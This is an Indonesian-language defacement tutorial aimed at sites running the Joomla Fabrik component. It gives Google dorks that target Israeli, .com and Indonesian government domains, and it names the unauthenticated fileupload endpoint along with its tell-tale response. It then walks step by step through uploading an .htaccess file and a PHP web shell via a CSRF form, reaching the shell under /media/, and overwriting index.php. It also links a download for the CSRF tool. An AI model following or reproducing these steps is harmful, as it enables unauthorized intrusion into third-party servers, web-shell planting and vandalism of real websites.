Tutorial
1. dorking di google
Dork:
inurl:index.php?option=com_fabriksite:il
inurl:viewTable?cid=site:com
inurl:/Com_Fabrik Site:go.id
inurl:index.php?option=com_fabriksite:il
inurl:viewTable?cid=site:com
inurl:/Com_Fabrik Site:go.id
Dork Bisa Lu Kembangin Lagi
2. Pilih Salah Satu Web Lalu Elu Exploit
Exploit :
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Kalau WebVlun Muncul Bacaan
{“filepath”:null,”uri”:null}
{“filepath”:null,”uri”:null}
3. Buka csrf Dan Masukan Link Target Di Csrf lalu save dengan Extensi .html
4. Buka File csrf Nya , Lalu Upload .htaccess yang ada di file , Lalu Back Kehalaman Yang Tadi , Lalu Upload Shell.php Mu [Usahakan Shell Mini]
5. Sudah Terupload Saat Nya Tebas Index
6. lalu Masukan exploit ini
/media/namashellmu.php
Contoh :
7. Klik Public_html
8. Kalian Cari Bacaan index.php
9. Klik Edit
10. Lalu Hapus Semua Script Nya
11. Salin Script Mu Dan Paste Di Website Nya .
12. Lalu Klik Go .
Done
Download Csrf https://drive.google.com/file/d/1YXZIB5dRwLdZCNsixJurItuXRMVXGggO/view?usp=drivesdk
Upload By:./n00b_m45t3r>